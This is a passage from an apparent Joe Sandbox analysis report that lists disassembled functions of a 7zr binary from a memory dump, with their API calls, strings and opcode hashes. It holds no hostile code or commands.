                            • SetLastError.KERNEL32(00000000,?,?,00CA77DB,?,?,00000000,?,00CA7832,?,?,?,?,00000000), ref: 00CA7797
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$FilePointer
                            • String ID:
                            • API String ID: 1156039329-0
                            • Opcode ID: 0f320578e0322c3bc3a41f3a72cdee78dfdf8b307c379450e392e87bc7281fb6
                            • Instruction ID: 33ce244d5f4661f76c3faa11ef9fab8929b9989de7e21fb6da733eb9387a330d
                            • Opcode Fuzzy Hash: 0f320578e0322c3bc3a41f3a72cdee78dfdf8b307c379450e392e87bc7281fb6
                            • Instruction Fuzzy Hash: 8A11BF3560430AAFEF128F68CC45BAE37E5BF06368F148529F826D7291D7B09E10DB60
                            Function 00CA5A8C Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA5A91
                            • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00CA5AB7
                            • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00CA5AEC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFile$H_prolog
                            • String ID:
                            • API String ID: 3790360811-0
                            • Opcode ID: b2aeafe490d1967b57f3a9a2bdeb9856df5738d552bdfe5d7d90da9d29dfdb81
                            • Instruction ID: 56f42b2355ab373fc982d5b6827c534e7a01124ff197b46882b93615101b54d0
                            • Opcode Fuzzy Hash: b2aeafe490d1967b57f3a9a2bdeb9856df5738d552bdfe5d7d90da9d29dfdb81
                            • Instruction Fuzzy Hash: 8701B532E00217ABCF15ABA5AC816BEB775EF42355F148426EC21A3251CB364D05E660
                            Function 00CD5883 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(00D62938), ref: 00CD588B
                            • LeaveCriticalSection.KERNEL32(00D62938), ref: 00CD58BC
                              • Part of subcall function 00CDC911: GetTickCount.KERNEL32 ref: 00CDC926
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$CountEnterLeaveTick
                            • String ID: v
                            • API String ID: 1056156058-3261393531
                            • Opcode ID: eb705e5016e8fa8f03115c6a09c9373f0f7ff3ee25367c9aa9b86daf54e1e5b8
                            • Instruction ID: 194db950684f235a24113a4c69ba97fe840974dfc0d333c85cda36d82bc37710
                            • Opcode Fuzzy Hash: eb705e5016e8fa8f03115c6a09c9373f0f7ff3ee25367c9aa9b86daf54e1e5b8
                            • Instruction Fuzzy Hash: 2DE0E579616210DFC308DF19E948E9A77A5AFE9311F05056FF505C7362CB309949CAB1
                            Function 00CB5BEA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 481COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB5BEF
                              • Part of subcall function 00CB54C0: __EH_prolog.LIBCMT ref: 00CB54C5
                              • Part of subcall function 00CB5630: __EH_prolog.LIBCMT ref: 00CB5635
                              • Part of subcall function 00CC36EA: __EH_prolog.LIBCMT ref: 00CC36EF
                              • Part of subcall function 00CB57C1: __EH_prolog.LIBCMT ref: 00CB57C6
                              • Part of subcall function 00CB58BE: __EH_prolog.LIBCMT ref: 00CB58C3
                            Strings
                            • Cannot seek to begin of file, xrefs: 00CB610F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Cannot seek to begin of file
                            • API String ID: 3519838083-2298593816
                            • Opcode ID: 494ffcc3184f3bf61bd27b0cea43997dc833c8acfa6240c1c1435595e875fff8
                            • Instruction ID: f2a77a318bb1e5f80795fe24dffca02e115e3708595a2907e6139fde0ab54647
                            • Opcode Fuzzy Hash: 494ffcc3184f3bf61bd27b0cea43997dc833c8acfa6240c1c1435595e875fff8
                            • Instruction Fuzzy Hash: B012133090478A9FDF26DFB8C884BEEBBF5AF05304F14401DE45667292CB74AA85CB61
                            Function 00CE4E8A Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 468COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE4E8F
                              • Part of subcall function 00CA965D: VariantClear.OLEAUT32(?), ref: 00CA967F
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ClearH_prologVariantfree
                            • String ID: file
                            • API String ID: 904627215-2359244304
                            • Opcode ID: 842c84354fe77012912a5e525b041f699e3fba272b3d73c5f9f88cf656a99143
                            • Instruction ID: 8602b33db15efcc7d0344e5f551c9935e6cd4f409702d9e5cc1b61c330c585b5
                            • Opcode Fuzzy Hash: 842c84354fe77012912a5e525b041f699e3fba272b3d73c5f9f88cf656a99143
                            • Instruction Fuzzy Hash: 4812B434900249DFCF11EFE6C985ADDBBB6BF45348F244068F815AB2A2DB329E45DB50
                            Function 00CC2CDB Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 388COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC2CE0
                              • Part of subcall function 00CA5E10: __EH_prolog.LIBCMT ref: 00CA5E15
                              • Part of subcall function 00CB41EC: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CB421A
                              • Part of subcall function 00CA965D: VariantClear.OLEAUT32(?), ref: 00CA967F
                            Strings
                            • Cannot create output directory, xrefs: 00CC3070
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ClearExceptionThrowVariant
                            • String ID: Cannot create output directory
                            • API String ID: 814188403-1181934277
                            • Opcode ID: 9110e283f7498ac6d4936b37a3481dea0eac938339266195e65cc4ed3a68ae8a
                            • Instruction ID: 04a67ff2b8353dacd524e842af8cf9e8e7b74964a3bf7d7441fb0a11fbb92e1e
                            • Opcode Fuzzy Hash: 9110e283f7498ac6d4936b37a3481dea0eac938339266195e65cc4ed3a68ae8a
                            • Instruction Fuzzy Hash: 44F19D309002999FCF25EFA4C890EEEBBB5BF19304F1440ADE495A7252DB31AF49DB51
                            Function 00CDC7D7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • fputs.MSVCRT ref: 00CDC840
                              • Part of subcall function 00CA25CB: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CA25ED
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowfputs
                            • String ID:
                            • API String ID: 1334390793-399585960
                            • Opcode ID: e57fd976cccd200238e3d68a293eef1f0a597933797d5c67080004a9acce551e
                            • Instruction ID: 423db421ed466b0c9c9a88fb7004371ec59d8e956ea11bb725c0be7b2d95f020
                            • Opcode Fuzzy Hash: e57fd976cccd200238e3d68a293eef1f0a597933797d5c67080004a9acce551e
                            • Instruction Fuzzy Hash: 9811EF716047419FDB25CF58C8C1BAAFBE6EF4A304F04446EE2868B281C7B1B904DB60
                            Function 00CD6086 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: Open
                            • API String ID: 1795875747-71445658
                            • Opcode ID: d65cfbfecdafb2414f18459c94e0f83473930aaa70bb71278ddcec334d350558
                            • Instruction ID: 385203e53d473a4d294c4bdf6f2cef4b97af0bc83631ab490363c21fe23f6e20
                            • Opcode Fuzzy Hash: d65cfbfecdafb2414f18459c94e0f83473930aaa70bb71278ddcec334d350558
                            • Instruction Fuzzy Hash: 87119E361017049FC720EF78DD91ADABBE1EF15310F40892FE69A83212DA71A904CF60
                            Function 00CB58BE Relevance: 3.3, APIs: 2, Instructions: 253COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB58C3
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: e7cf909a4ed3ae7b4420b2c1c747406a37ef1e5ecc155729391b116c129dcae9
                            • Instruction ID: 9f61950406b3f0c6a0cb20fb881b1a6b2964070e987024876c4d65e162b5475b
                            • Opcode Fuzzy Hash: e7cf909a4ed3ae7b4420b2c1c747406a37ef1e5ecc155729391b116c129dcae9
                            • Instruction Fuzzy Hash: D091F335900A0ADFCF25EFA4C881BFEBBB2EF45344F144068E952A7252DB315E45EB61
                            Function 00CF06AE Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CF06B3
                            • _CxxThrowException.MSVCRT(?,00D5D480), ref: 00CF08F2
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrow$H_prologmalloc
                            • String ID:
                            • API String ID: 3044594480-0
                            • Opcode ID: 19b63c15891c781c88377a357818b584c6dbbfad353fa4632adaa160e28b9a76
                            • Instruction ID: 5aae132fbe33f0cbf914108442a668af049e40b2810b4722831e34ccadc660cb
                            • Opcode Fuzzy Hash: 19b63c15891c781c88377a357818b584c6dbbfad353fa4632adaa160e28b9a76
                            • Instruction Fuzzy Hash: E4916C74D00249DFCF21DFA9C881AEEBBB5BF09344F244099E955A7292C730AE45DFA1
                            Function 00CB7190 Relevance: 3.1, APIs: 2, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: a2dff2584aca695afce4d3ff7aa97e0eb1f79b5a9d411e836e8800aaf0305c80
                            • Instruction ID: 593faea09ac89d7ab80981be0b59737ea8279d53952ba7d4cf06cfcb24adf97d
                            • Opcode Fuzzy Hash: a2dff2584aca695afce4d3ff7aa97e0eb1f79b5a9d411e836e8800aaf0305c80
                            • Instruction Fuzzy Hash: 9C518171508B40DFDB25DF74C490AEABBF5BF85304F188A5DE8E64B212D730AA84DB51
                            Function 00CC7B48 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CC7B4D
                            • memcpy.MSVCRT(00000000,00D627DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 00CC7C65
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologmemcpy
                            • String ID:
                            • API String ID: 2991061955-0
                            • Opcode ID: 494610fb5430282b4b063d152875f64ddbf14b8d5c570e745002f272c5c60125
                            • Instruction ID: e9068a2bce5b7c59d2af76bd2662a887e9e1eb0493000f8912d47df3b044dfed
                            • Opcode Fuzzy Hash: 494610fb5430282b4b063d152875f64ddbf14b8d5c570e745002f272c5c60125
                            • Instruction Fuzzy Hash: 8D4165709042199BCB20EFA4C992FEEB7F4FF04304F10452DE856A3292DB31AE09DB60
                            Function 00CF1511 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CF1516
                              • Part of subcall function 00CF10D3: __EH_prolog.LIBCMT ref: 00CF10D8
                            • _CxxThrowException.MSVCRT(?,00D5D480), ref: 00CF1561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: c362d4f3a3410bb6fb085f26933173a5f1ec38bffec739a32abc980be469912b
                            • Instruction ID: 12485cbac7ad40f500a6778e010e0c99b5a24aac1a1ea57cb73faf2649185820
                            • Opcode Fuzzy Hash: c362d4f3a3410bb6fb085f26933173a5f1ec38bffec739a32abc980be469912b
                            • Instruction Fuzzy Hash: 8001F272900248EFDF118F94C815BEEBFB8EF81360F08405AF9455A211C3B5E955D7B1
                            Function 00CD57FB Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD5800
                            • fputs.MSVCRT ref: 00CD5830
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputcfputsfree
                            • String ID:
                            • API String ID: 195749403-0
                            • Opcode ID: a1cd674a3978b979f4f15600f58ac3631db7206e5208ee9acae6743570c80b75
                            • Instruction ID: b486da9c170fcdf95b85c11efa7fe47fd28808307343a7307fc0c609671cf7ff
                            • Opcode Fuzzy Hash: a1cd674a3978b979f4f15600f58ac3631db7206e5208ee9acae6743570c80b75
                            • Instruction Fuzzy Hash: F6F05E32901519DFCB15BF94E8067DEBBB1EF05354F00442AF501A26A1CB745955DB94
                            Function 00CDB5B1 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$fputc
                            • String ID:
                            • API String ID: 1185151155-0
                            • Opcode ID: 4cb2f758a86866f949e777bac042daea573c6fe06e740d701e148269683d48a9
                            • Instruction ID: f579dd8cae151462bf00585e822312eb5541003f7b0015a69e90886cea7e23e7
                            • Opcode Fuzzy Hash: 4cb2f758a86866f949e777bac042daea573c6fe06e740d701e148269683d48a9
                            • Instruction Fuzzy Hash: 1DE0123B60A314AF97162B58BC018553BD5DBCA76232A002FFB40D3360BF537D156AB4
                            Function 00CA950D Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocStringLen.OLEAUT32(?,?), ref: 00CA952C
                            • _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CA954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionStringThrow
                            • String ID:
                            • API String ID: 3773818493-0
                            • Opcode ID: 1681c67d82f620632fc1adeca7b91386d6ac215818bc6d7e07b369b5c7ba2aee
                            • Instruction ID: 556764a295b70afe54c37ef6fe50589b3331ff3b9ee0823dd45eae357271af56
                            • Opcode Fuzzy Hash: 1681c67d82f620632fc1adeca7b91386d6ac215818bc6d7e07b369b5c7ba2aee
                            • Instruction Fuzzy Hash: 70F065716103059FC710DF94D846D8677ECEF05344740842AF945CB310E770E80487A0
                            Function 00D37E00 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast_beginthreadex
                            • String ID:
                            • API String ID: 4034172046-0
                            • Opcode ID: 53119957339ee447ad328db3177bb892e590d7d4e3e9ee3e0aaade2433b7f3b4
                            • Instruction ID: 4ee8f2ad5e7386b1f7955b21d6ce26da1e1c524fa572556eab395745793d1030
                            • Opcode Fuzzy Hash: 53119957339ee447ad328db3177bb892e590d7d4e3e9ee3e0aaade2433b7f3b4
                            • Instruction Fuzzy Hash: 15E0C2F62093026BF3209B60CC02F77729CEBA0B80F44847DFA45D6180E660CD00C7B1
                            Function 00CA9C4D Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00CA9C6E), ref: 00CA9C52
                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CA9C59
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrentMask
                            • String ID:
                            • API String ID: 1231390398-0
                            • Opcode ID: 098c2f30d620e281e3dcf64170f35c12354cfd32fff4cdee334f52c0c9af968b
                            • Instruction ID: 365811ed7b512231d5d90c6eea2c4bb6120c3d64883e249bdc590cf6fbd28a8b
                            • Opcode Fuzzy Hash: 098c2f30d620e281e3dcf64170f35c12354cfd32fff4cdee334f52c0c9af968b
                            • Instruction Fuzzy Hash: 92B012BA421340FFDF649FB0DD0CC163B2CEA063013005644F109C2110D636C045CF70
                            Function 00CAB668 Relevance: 2.7, APIs: 2, Instructions: 222COMMON
                            Download Yara Rule
                            APIs
                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 00CAB843
                            • GetLastError.KERNEL32 ref: 00CAB8AA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLastmemcpy
                            • String ID:
                            • API String ID: 2523627151-0
                            • Opcode ID: ca35c46037ab7d339bb5c30c221c2fc331370032afd5aaf37518962630389b23
                            • Instruction ID: 6ca3d496c285bde1b338f5eff75696f9e84ba06a4a65e62a31df993246650f42
